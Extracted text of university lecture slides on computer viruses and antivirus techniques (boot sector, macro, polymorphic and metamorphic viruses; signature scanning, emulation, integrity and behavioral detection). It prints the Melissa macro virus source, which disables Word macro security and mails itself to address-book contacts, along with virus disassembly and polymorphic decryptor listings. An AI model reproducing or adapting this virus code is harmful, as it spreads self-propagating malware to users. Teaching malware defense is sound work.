cse 127 computer security - home | computer science · boot sector...

CSE 127Computer Security

Fall 2015Malware I: Viruses and virus-defense

Stefan Savage

AV sides courtesy Carey Nachenberg

Project 2§ Buffer overflow problems on ARM architecture

§Will be discussed, in depth, at Monday discussion section (including working through first problem!)

§ Due Nov 24th

Recap§ Various ways to compromise software systems based in input and timing Buffer overflows, format string errors, TOCTOU, SQL injection, XSS etc…

§ But once you’ve compromised system, then what does the malicious software do?

§ First: propagates itself to create an installed base

§ Today: viruses – the oldest mass malware

November 7, 2015

Viruses§ A computer virus is a (malicious) program

Attaches to a host program or data Creates (possibly modified) copies of itself Payload of program may have other effects (deleting files, opening backdoors, printing messages, etc)

§ Viruses traditionally require some user action to activate (i.e. execute some file, open some spreadsheet, etc)

November 7, 2015

Virus Writer’s Goals§ Hard to detect§ Hard to destroy or deactivate§ Spreads infection widely/quickly§ Can reinfect a host§ Easy to create

November 7, 2015

Kinds of Viruses§ Boot Sector Viruses

Historically important, but less common today§ Memory Resident Viruses

Standard infected executable§ Macro Viruses

Embedded in documents (like Word docs)§ E-mail/IM Viruses

Spread via attachments§Web platform viruses

Spread on Web sites (e.g. social net applications)

November 7, 2015 7

Boot sector Viruses (old school)

§ Vector: floppy disks§ Bootstrap Process:

Firmware (ROM) copies MBR (master boot record) to memory, jumps to that program

§ MBR (or Boot Sector) Fixed position on disk “Chained” boot sectors permit longer Bootstrap Loaders

MBR boot boot

November 7, 2015

Boot sector Viruses

§ Virus breaks the chain§ Inserts virus code§ Reconnects chain afterwards

MBR boot bootvirus

November 7, 2015 9

Why attack the Bootstrap?§ Automatically executed before OS is running

Any thus, before detection tools are running§ OS hides boot sector information from users

Hard to discover that the virus is there Harder to fix

§ Any good virus scanning software scans the boot sectors But good bootsector viruses may restore good bootsector during normal operation (replace it when you logout or when anti-virus software isn’t running)

Bootsector malware is back recently with a vengeance (Meebroot/Sinowal)

November 7, 2015 10

Virus Attachment to Host Code

§ Simplest case: insert copy at the beginning of an executable file Runs before other code of the program Historically most common program virus

§ Runs before & after original program Virus can clean up after itself

§ Virus could modify code in place Doesn’t change size, but could change behavior Maybe harder to detect?

OriginalProgram

ModifiedProgram

November 7, 2015

Other virus tricks§ Entry-point obscuring viruses

Virus takes control in middle of program (random code point) and is harder to scan for

§ Polymorphic viruses Virus encrypts body with random key in each generation

§ Metamorphic viruses Virus rewrites self in each generator (semantically equivalent, but different instruction stream)» Instruction substitution, control flow rewriting, etc

November 7, 2015

Other Homes for Viruses§ System Software

IO.sys, NTLDR, NTDETECT.COM autoexec.bat, config.sys, command.com

§ Memory resident software Task manager Window manager Winamp RealPlayer …

November 7, 2015 13

Macro Viruses§ Many applications support Macros§ Macros are just programs§Word processors & Spreadsheets

Startup macro Macros turned on by default

§ Visual Basic Script (VBScript)

November 7, 2015

Melissa Macro Virus§ Implementation

VBA (Visual Basic for Applications) code associated with the "document.open" method of Word

§ Strategy Email message containing an infected Word document as an attachment (social engineering)

Opening Word document triggers virus if macros are enabled

Under certain conditions included attached documents created by the victim

November 7, 2015 15

Melissa Macro Virus: Behavior§ Setup

Lowers the macro security settings Permit all macros to run without warning Checks registry for key value “… by Kwyjibo” HKEY_Current_User\Software\Microsoft\Office\Melissa?

§ Propagation Sends email message to the first 50 entries in every Microsoft Outlook MAPI address book readable by the user executing the macro

November 7, 2015 16

Melissa Macro Virus: Behavior§ Propagation Continued

Infects Normal.doc template file Normal.doc is used by all Word documents

§ “Joke” If minute matches the day of the month, the macro inserts message “Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here.”

November 7, 2015 17

// Melissa Virus Source Code

Private Sub Document_Open()On Error Resume NextIf System.PrivateProfileString("","HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> ""ThenCommandBars("Macro").Controls("Security...").Enabled = FalseSystem.PrivateProfileString("","HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&ElseCommandBars("Tools").Controls("Macro").Enabled = FalseOptions.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1):Options.SaveNormalPrompt = (1 - 1)End IfDim UngaDasOutlook, DasMapiName, BreakUmOffASliceSet UngaDasOutlook = CreateObject("Outlook.Application")Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")

If System.PrivateProfileString("","HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo"ThenIf UngaDasOutlook = "Outlook" ThenDasMapiName.Logon "profile", "password"For y = 1 To DasMapiName.AddressLists.CountSet AddyBook = DasMapiName.AddressLists(y)x = 1Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)For oo = 1 To AddyBook.AddressEntries.CountPeep = AddyBook.AddressEntries(x)BreakUmOffASlice.Recipients.Add Peepx = x + 1If x > 50 Then oo = AddyBook.AddressEntries.Count

Next ooBreakUmOffASlice.Subject = "Important Message From " &

Application.UserNameBreakUmOffASlice.Body = "Here is that document you asked for ... don't

show anyone else ;;-)"BreakUmOffASlice.Attachments.Add ActiveDocument.FullNameBreakUmOffASlice.SendPeep = ""

Next yDasMapiName.LogoffEnd If

November 7, 2015 19

Melissa Virus§ Transmission Rate

The first confirmed reports of Melissa were received on Friday, March 26, 1999.

By Monday, March 29, it had reached more than 100,000 computers.

One site got 32,000 infected messages in 45 minutes. § Damage

Denial of service: mail systems off-line. Could have been much worse

§ Remedy Filter mail for virus signature (macro in .doc files) Don’t run Macros in unknown documents by default Clean Normal.doc

20

Detecting Viruses

§ Scanning§ Integrity checking§ Heuristic detection

21

Virus Signatures§ Viruses can’t be completely invisible:

Code must be stored somewhere Virus must do something when it runs Idea: look in files for “signature” byte sequences that are unique to the virus

§ Issues Where to scan (beginning of file, whole file, registry settings, etc)

How to scan (look for “ILOVEYOU” string, or actually execute program)

How long to scan (tradeoffs in performance/coverage) How to distinguish polymorphs (research issue)

1. User runs an infected program.

0100 EB1C JMP 011E0102 BE1B02 MOV SI,021B0105 BF1B01 MOV DI,011B0108 8BCE MOV CX,SI010A F7D9 NEG CX010C FC CLD010D B81B01 MOV AX,011B0110 06 PUSH ES0111 50 PUSH AX0112 06 PUSH ES0113 B81801 MOV AX,01180116 50 PUSH AX0117 CB RETF0118 F3 REPZ0119 A4 MOVSB011A CB RETF011B E93221 JMP 2250011E 83C24F ADD DX,+4F0121 8BFA MOV DI,DX0123 81FF8000 CMP DI,00800127 725E JB 01870129 7406 JZ 0131012B C606250273 MOV BYTE PTR [0225],730130 90 NOP0131 FEC5 INC CH0133 7303 JNB 01380135 80C140 ADD CL,400138 B8010C MOV AX,0C01013B 8BD6 MOV DX,SI013D CD13 INT 13

Infected Program

2. Program transfers control to thevirus.

The Simple Virus

3. Virus locates a new program.


Infected Program

0100 B435 MOV AH,350102 B021 MOV AL,210104 CD21 INT 210106 8C06A002 MOV [02A0],ES010A 891E9E02 MOV [029E],BX010E B425 MOV AH,250110 B021 MOV AL,210112 BA2001 MOV DX,01200115 CD21 INT 21

4. Virus appends its logic to theend of the new file.

0117 83C24F ADD DX,+4F011A 8BFA MOV DI,DX011C 81FF8000 CMP DI,00800120 725E JB 01870122 7406 JZ 01310124 C606250273 MOV BYTE PTR [0225],730129 90 NOP012A FEC5 INC CH012C 7303 JNB 0138012E 80C140 ADD CL,400132 B8010C MOV AX,0C010135 8BD6 MOV DX,SI0137 CD13 INT 13

The Simple Virus

5. Virus updates the new programso the virus gets control when the program is launched.


Infected Program

0100 B435 MOV AH,350102 B021 MOV AL,210104 CD21 INT 210106 8C06A002 MOV [02A0],ES010A 891E9E02 MOV [029E],BX010E B425 MOV AH,250110 B021 MOV AL,210112 BA2001 MOV DX,01200115 CD21 INT 210117 83C24F ADD DX,+4F011A 8BFA MOV DI,DX011C 81FF8000 CMP DI,00800120 725E JB 01870122 7406 JZ 01310124 C606250273 MOV BYTE PTR [0225],730129 90 NOP012A FEC5 INC CH012C 7303 JNB 0138012E 80C140 ADD CL,400132 B8010C MOV AX,0C010135 8BD6 MOV DX,SI0137 CD13 INT 13

0100 EB1C JMP 0117

The Simple Virus

25

Head/Tail ScannersMost of these application-infecting viruses attached

themselves to either the top or bottom of the host file:

Host

Virus

Host

VirusSo anti-virus engineersbuilt head/tail scanners.

The scanner loads thehead and tail regions

of the file into a bufferand then scans witha multi-string search

algorithm.

26

So what do the bad guys do?§ Move the virus to the middle of the file§ Becomes prohibitively expensive to scan

Must scan whole file

§ Solution: scalpel scanning Idea: limit scanning to likely entry-points for viruses If you have more time you can also scan for more than just strings (regular expressions)

27

0100 EB04 JMP 1060102 B021 MOV AL,210104 CD21 INT 210106 EB09 JMP 1120108 B404 MOV AH, 04010A 891E9E02 MOV [029E],BX010E B425 MOV AH,250110 B021 MOV AL,210112 E90200 JMP 1170115 CD21 INT 210117 83C24F ADD DX,+4F011A 8BFA MOV DI,DX011C 81FF8000 CMP DI,00800120 725E JB 01870122 7406 JZ 01310124 C606250273 MOV BYTE PTR [0225],730129 90 NOP012A FEC5 INC CH012C 7303 JNB 0138012E 80C140 ADD CL,400132 B8010C MOV AX,0C010135 8BD6 MOV DX,SI0137 CD13 INT 13

Scalpel ScanningJMP1. Locate the main program

entry-point.

2. While the current instruction is a JUMP or a CALL instruction, trace it.

3. If the current instruction is nota JUMP or CALL instruction, search for all fingerprints in this region of the file.

JMP

JMPADD

28

The Encrypted Virus

HOST

KEY1

WjsvtDecrypt

HOST

KEY2

UhqtrDecrypt

Soon after the first generation of executable viruses, virus authors began writing self-encrypting strains.

These viruses carry a small decryption loop that runs first, decrypts the virus body and then launches the virus.

Each time the virus infects a new file, it changes the encryption key so the virus body looks different.

29

1. MOV DI, 120h2. MOV AX, [DI]3. XOR AX, 5132h4. MOV [DI], AX5. ADD DI, 2h6. CMP DI, 2500h7. JNE 38. WJSVTPBMZPL9. NAADJGNANW...

Still easy to detect because the decryption loop stays the same.

The Encrypted VirusThe decryption routine stays the same. Only the key(s) change.

1. MOV DI, 120h2. MOV AX, [DI]3. XOR AX, 0030h4. MOV [DI], AX5. ADD DI, 2h6. CMP DI, 2500h7. JNE 38. PKEPAJHENZAW9. MNANTPOOTIZN...

The encrypted body changes.

30

The Polymorphic Virus§ Polymorphic viruses are self-encrypting viruses with a changing decryption algorithm

§ When infecting a new file, such a virus: Generates brand-new decryption code from scratch

Encrypts a copy of itself using a complementary encryption algorithm

Inserts both the new decryption code and the encrypted body of the virus into target file

31

Virus

Mutation Engine

Virus

Mutation Engine

Host Program

RAM

Decryption Loop

1. User Executes Program

Virus

Mutation Engine

Virus

Mutation Engine

Decryption Loop

The Polymorphic Virus

32

Virus

Mutation Engine

Virus

Mutation Engine

Host Program

RAM

Decryption Loop

1. User Executes Program2. Virus Decrypts Itself

Virus

Mutation Engine

Virus

Mutation Engine

Decryption Loop


33

Virus

Mutation Engine

Virus

Mutation Engine

Host Program

RAM

Decryption Loop


Virus

Mutation Engine

Virus

Mutation Engine

Decryption Loop


34

Virus

Mutation Engine

Virus

Mutation Engine

Host Program

RAM

Decryption Loop


Virus

Mutation Engine

Virus

Mutation Engine

Decryption Loop


35

Virus

Mutation Engine

Virus

Mutation Engine

Host Program

RAM

Decryption Loop

3. Virus finds new prog.

Virus

Mutation Engine

Virus

Mutation Engine

Decryption Loop Host Program

(New)


36

Virus

Mutation Engine

Virus

Mutation Engine

Host Program

RAM

Decryption Loop

Virus

Mutation Engine

Virus

Mutation Engine

Decryption Loop Host Program

(New)

4. Mutation enginecreates new decryptor.

Decryption Loop’

3. Virus finds new prog.


37

Virus

Mutation Engine

Virus

Mutation Engine

Host Program

RAM

Decryption Loop

Virus

Mutation Engine

Virus

Mutation Engine

Decryption Loop

Decryption Loop’

Host Program

(New)

5. Virus makes a new copy of itself and encrypts this copy.

Virus

Mutation Engine


38

Virus

Mutation Engine

Virus

Mutation Engine

Host Program

RAM

Decryption Loop

Virus

Mutation Engine

Virus

Mutation Engine

Decryption Loop

Decryption Loop’

Host Program

(New)


Virus

Mutation Engine


39

Virus

Mutation Engine

Virus

Mutation Engine

Host Program

RAM

Decryption Loop

Virus

Mutation Engine

Virus

Mutation Engine

Decryption Loop

Decryption Loop’

Host Program

(New)


Virus

Mutation Engine


40

Virus

Mutation Engine

Virus

Mutation Engine

Host Program

RAM

Decryption Loop

Virus

Mutation Engine

Virus

Mutation Engine

Decryption Loop

Decryption Loop’

Host Program

(New)


Virus

Mutation Engine


41

Virus

Mutation Engine

Virus

Mutation Engine

Host Program

RAM

Decryption Loop

Virus

Mutation Engine

Virus

Mutation Engine

Decryption Loop

Decryption Loop’

Host Program

(New)

Virus

Mutation Engine6. Virus appends the new decryptor and encrypted virus body to new file.


42

Virus

Mutation Engine

Virus

Mutation Engine

Host Program

RAM

Decryption Loop

Virus

Mutation Engine

Virus

Mutation Engine

Decryption Loop

Decryption Loop’

Host Program

(New)

Virus

Mutation Engine

Decryption Loop’

Virus

Mutation Engine


43

RAM

Virus

Mutation Engine

Virus

Mutation Engine

Decryption Loop

Decryption Loop’

Host Program

(New)

Virus

Mutation Engine

Decryption Loop’

Virus

Mutation Engine

And we have a new infection!


44

The Polymorphic VirusAddr Machine Code Mnemonic0100 50 PUSH AX0101 B8347E MOV AX,7E340104 25A907 AND AX,07A90107 95 XCHG BP,AX0108 B840B2 MOV AX,B240010B BABBB8 MOV DX,B8BB010E F7EA IMUL DX0110 93 XCHG BX,AX0111 B8B4D2 MOV AX,D2B40114 03C3 ADD AX,BX0116 2BC5 SUB AX,BP0118 BA479A MOV DX,9A47011B F7E2 MUL DX011D 95 XCHG BP,AX011E B809F4 MOV AX,F4090121 2BC5 SUB AX,BP0123 91 XCHG CX,AX0124 B8AB6A MOV AX,6AAB0127 BA972C MOV DX,2C97012A F7E2 MUL DX012C D1C0 ROL AX,1012E 80E11F AND CL,1F0131 D3E0 SHL AX,CL0133 91 XCHG CX,AX0134 B8E1CE MOV AX,CEE10137 03C1 ADD AX,CX0139 93 XCHG BX,AX013A B84A43 MOV AX,434A013D 29C3 SUB BX,AX013F F7DB NEG BX0141 8B86381B MOV AX,[BP+1B38]0145 8ACB MOV CL,BL0147 D3C8 ROR AX,CL0149 2D23C9 SUB AX,C923014C B108 MOV CL,08014E D3C8 ROR AX,CL0150 8786381B XCHG AX,[BP+1B38]0154 B80765 MOV AX,65070157 BA55B3 MOV DX,B355015A F7E2 MUL DX015C 96 XCHG SI,AX015D 8BC5 MOV AX,BP015F 2BC6 SUB AX,SI0161 BAE337 MOV DX,37E30164 F7E2 MUL DX0166 96 XCHG SI,AX0167 B80765 MOV AX,6507016A BA55B3 MOV DX,B355016D F7E2 MUL DX016F 91 XCHG CX,AX0170 8BC6 MOV AX,SI0172 BACBC5 MOV DX,C5CB0175 F7E2 MUL DX0177 03C1 ADD AX,CX0179 95 XCHG BP,AX017A 45 INC BP017B 45 INC BP017C 75A0 JNZ 011E

Addr Machine Code Mnemonic

0200 BE36F2 MOV SI,F2360203 8BFE MOV DI,SI0205 B807D7 MOV AX,D707 0208 33C7 XOR AX,DI 020A 95 XCHG BP,AX 020B B858AC MOV AX,AC58 020E F7ED IMUL BP0210 2560B1 AND AX,B1600213 95 XCHG BP,AX 0214 B8C0EA MOV AX,EAC0 0217 8BCD MOV CX,BP 0219 80E11F AND CL,1F 021C D3E8 SHR AX,CL 021E 85C0 TEST AX,AX 0220 7503 JNZ 0225 0222 FB STI0223 F1 DB F1 0224 AB STOSW 0225 91 XCHG CX,AX 0226 36 SS:0227 8B852310 MOV AX,[DI+1023]022B D3C0 ROL AX,CL 022D BA4FB9 MOV DX,B94F0230 F7E2 MUL DX 0232 36 SS:0233 89852310 MOV [DI+1023],AX0237 8BEF MOV BP,DI0239 8BFD MOV DI,BP023B 47 INC DI023C 47 INC DI 023D 75C6 JNZ 0205

Here we have a decryption loop from an MtE-based

virus infection.

And here’s a second generation decryption loop of

the same virus strain.

45

Detecting The Polymorphic Virus

So how do we detect such a beast?

B98104%F%1BD????%FBE????%F%53142??%F??C0%F45%F??CC%FE2B98104%8BB????%FBE????%F%53140??%F??C0%F43%F??CC%FE2B98104%F%5BE????%F%53144??%F??C0%F46%F??CC%FE2B98104%F%9BF????%F%53145??%F??C0%F47%F??CC%FE2B98104%F%1BD????%FBF????%F%53143??%F??C0%F47%F??CC%FE2B98104%8BB????%F%1BF????%F%53141??%F??C0%F47%F??CC%FE2

The number of strings (alg. sigs) explodes quickly!Detecting the decryption loop is prone to false positives!

1. Use lots of wildcard strings strings/scripts:

2. X-ray techniques (plaintext attack on encrypted virus body)

46

Assume the file is infected and perform a plain-text attack of the encrypted virus code. This only works for simple schemes (but its often sufficient).

Scanned file: 60 5C 5D 47 14 5D 47 14-55 14 40 51 47 40

54 68 69 73 20 69 73 20-61 20 74 65 73 74Virus plain-text: +

34

+

34

+

34

+

34

The key must be 34!

The scheme must be XOR!

X-ray scanning

Host Program

7 bytes from EOF = “VIRUS”?AMBCAPQYEQYQWERQWERQWERERGQWETWLRW

47

“Generic” Decryption§ Invented by Alan Solomon (a.k.a. Dr. Solomon)

Chose name to obscure how it worked§ Assumptions

Virus gains control of the host immediately Virus decrypts itself deterministically Virus has a some static body that can be detected with traditional signatures

§ Key idea: Emulate code execution until the virus decrypts itself

» Typically use some sort of virtual machine (VM) environment Search for signatures in memory

48

Simulated OSand other data structures

Virus

Mutation Engine

Virus

Mutation Engine

Host Program

Decryption Loop

Virtual Machine

1. Load suspectedprogram into VM.

Host Program

Decryption Loop

Mutation Engine

Virus

2. Allow the programto execute normally.

Modified MemoryProgram Off Disk

Generic Decryption

49


Generic Decryption

Virtual Machine


Host Program

Decryption Loop

Mutation Engine

Virus


3. “Tag” all modifiedmemory as theprogram executes.

Modified Memory

1. Fetch Byte2. Decrypt Byte3. Store Byte4. Loop to 1

50 Virtual Machine Modified Memory




Generic Decryption1. Load suspected

program into VM.

Host Program

Decryption Loop

Mutation Engine

Virus


51



Generic Decryption

Virtual Machine


Host Program

Decryption Loop

Mutation Engine

Virus


Modified Memory


52


Generic Decryption

Virtual Machine


Host Program

Decryption Loop

Mutation Engine

Virus



Modified Memory


x

53


Generic Decryption

Virtual Machine


Host Program

Decryption Loop

Mutation Engine

Virus



Modified Memory


xAnd on it goes...

54



Generic Decryption

Virtual Machine


Host Program

Decryption Loop

Mutation Engine

Virus


Modified Memory


xAnd on it goes... x

55


Generic Decryption

Virtual Machine


Host Program

Decryption Loop

Mutation Engine

Virus



Modified Memory



x

56


Generic Decryption

Virtual Machine


Host Program

Decryption Loop

Mutation Engine

Virus



Modified Memory



xx

57


Generic Decryption

Virtual Machine


Host Program

Decryption Loop

Mutation Engine

Virus



Modified Memory



xx

4. Scan all modifiedareas of virtualmemory for virussignatures.

58


Generic Decryption

Virtual Machine

4. Scan all modifiedareas of virtualmemory for virussignatures.

Host Program

Decryption Loop

Mutation Engine

Virus




Modified Memory

xxxx

KILL KILL KILL

59

Challenges with GD§ How long to emulate program?

Emulate too long and the system slows to a crawl Don’t emulate enough and you might miss the virus

§ Two approaches Heuristic-driven emulation

» Emulate while you see “suspicious” behavior Unusual instruction sequences, sequence modifications of memory, etc

» Suffers from false positives and false negatives & can be avoided

» Prolong execution on uninfected files Profile driven emulation

60

Profile-based EmulationFor each new polymorphic virus strain, engineers identify its key characteristics and then add this profile to the anti-virus

data files.

Fetch and emulate instructions from a program fileas long as its instructions are consistent with at

least one polymorphic virus profile.

When all viruses have been eliminated from consideration, cease emulation.

61

DSCE 1001000000..MtE 0111000001..

SMEG 0001000111..... ...

0100 JMP 1170102 MOV AL,210104 INT 210106 MOV [02A0],ES010A MOV [029E],BX010E MOV AH,250110 MOV AL,210112 MOV DX,01200115 INT 210117 ADD DX,+4F011A MOV DI,DX011C CMP DI,00800120 JB 01870122 JZ 01310124 MOV BYTE PTR [0225],730129 NOP

Profile-based Emulation

62

DSCE 1001000000..MtE 0111000001..

SMEG 1001000111..... ...



63

DSCE 1001000000..MtE 0111000001..

SMEG 1001100111..... ...



64

DSCE 1001000000..MtE 0111000001..

SMEG 1001100111..... ...



and so on...

65


Poly #1a

Poly #1b

Poly #3Poly

#4

Poly #2

Poly #5

Poly #3b

The profiles are specific to each polymorphic virus, limiting the search space. This reduces the number of iterations

required on uninfected files.

Clean File

Clean File

Clean File

66

Problems§ Time consuming to generate profiles

And if you get one wrong you can miss stuff§ Lots of ways to get around GD

Random viruses» V will only run if the time is between 3 and 4pm

Emulator-aware viruses» V detects its in an emulator and hides

Maxed-out iteration viruses» V takes too long to emulate

Entry-point Obscuring Viruses

67

Entry-point Obscuring Viruses

These viruses do notgain control at the main

program entry-point.

Instead, they modify the host program to transfer control

to the virus at some obfuscated point in the program.

MZ

PE

Section #1 InfoSection #2 InfoSection #3 InfoSection #4 Infocode code code code code codcode code code code code codcode code code code code codcode code code code code codcode code code code code codcode code code code code codcode code code code code codcode code code code code coddata data data data data data ddata data data data data data ddata data data data data data ddata data data data data data d.reloc .reloc .reloc .reloc .relo.reloc .reloc .reloc .reloc .relo.reloc .reloc .reloc .reloc .relo.reloc .reloc .reloc .reloc .relo

Decrypt virus virus virus vivirus virus virus virus virus vivirus virus virus virus virus vivirus virus virus virus virus vi

JMP

68

What to do…§ Tailored code written to detect each strain of virus (knowledgeable about EPO approach)

§ Typically low-level pseudo-code which evaluates program and can invoke emulator when necessary

§ Fast to execute but can be time-consuming to write

§ But it gets worse… Metamorphic viruses Integrated infection

69

The Metamorphic Virus

These viruses rewrite their logic in each new infection! They have no byte-level fingerprint anywhere!

Metamorphic strains use the current infection’s code as a template and then expand and contract sets of instructions

within the body to create a child infection.

Problems:1. Huge analysis time for researchers 2. Researchers forced to write new hand-coded detections for

each new strain3. Scanner performance potentially degrades linearly with each

new metamorphic detection

70

Rather than appending a single large chunk of code to target files, integrated infectors disassemble their host, integrate their logic

throughout the original logic, and reassemble.

Problem: There is no big chunk of code to identify and scan. Disinfection is a nightmare.

Integrated infection

71

Summary: Modern AV programs

§ Its not grep

§ Carefully constructed dictionary of known virus signatures Complex algorithmic signatures, not just strings

§ Whole system emulator executes programs in sandbox, scanning for signatures during execution Heuristics to determine how long to emulate, when to emulate etc….

Lots of tricks for speed

72

Virus Scanning: Pros & Cons§ Pros

Effectively detects known viruses before they can cause harm Few false alarms

§ Cons Can detect only viruses with known signatures

» Assumption is that samples can be obtained Signature set must be kept up to date

» Can take 5mins to identify simple signature, days for complex one

Signature set must be distributed to all clients» Symantec pushes 1.4B updates per day (~60TB)

Virus writers can easily change virus signatures» Packers…

Fundamentally a reactive business

73

Innoculation§ Most viruses use so kind of marker to identify infected files

§ Innoculation: add the marker to clean files so they won’t be infected

§ Drawbacks: Markerless or implicit marker viruses (e.g. file size, checksum)

Lots of different markers for different viruses;; need to change all files

74

Integrity Checks & whitelists§ Virus scanner computes hash or checksum of executable files (or downloads hash of “known good” files) Assumed to be virus free! Stores the hash information

§ Verifies new hash vs. saved one during scan

75

Integrity Checks: Pros & Cons§ Pros

Can detect corruption of executables too Reliable Doesn’t require virus signatures

§ Cons Whitelists need to be comprehensive

» Not useful if 10% of your programs aren’t covered False positives (i.e. recompilation, updates) Can’t use it on documents (they change too often)

76

Behavior-based Detection§ Collection of ad hoc rules that identifies virus behavior or virus-like programs Unusual system call behavior

» E.g. if you try to transmit a buffer that contains the contents of a stack buffer you received from the network

» Uncommon syscall/argument patterns from each codepoint Modification of system executables/templates

» normal.doc Self-modifying and self-referential code Rarely used instructions or lots of NOPs

§ This is where the action was until very recently

77

Behavior-based detection:Pros & Cons

§ Pros Perhaps able to detect unknown viruses

§ Cons Good heuristics are hard to develop Bad heuristics have too many false positives

§ All major AV programs have moved to incorporate behavioral techniques

The latest: Reputation systems§ You’ve just tried to execute a new program§ Your system doesn’t know anything specific about it

§ Score based on reputation Where did program get downloaded from? Have other people run program too? Do they tend to get infected a lot?

Do other features (libraries, compiler, filename, size, symbols, etc) correlate with past malware?

79

Disinfection§ Ok, you found a virus in a file… now what?§ Standard disinfection

Virus saves the beginning of the file it overwrites (for control transfer) so it can correctly execute it later

To clean: find virus, find original host file beginning, find size of virus. Now move original code to beginning, and truncate file to eliminate virus code

Specialized to each virus§ Generic disinfection

Run program and emulate until it restores the file to its normal state (so it can execute normally);; let the virus itself do the tough work

Rewrite cleaned program back to disk Works with roughly covers 70% of viruses Problems: viruses that overwrite code, viruses with unknown entry points, viruses not well modeled by heuristics – when is image clean?)

80

Next time…§ Next time: Worms (and maybe bots)

cse 127 computer security - home | computer science · boot sector...

Documents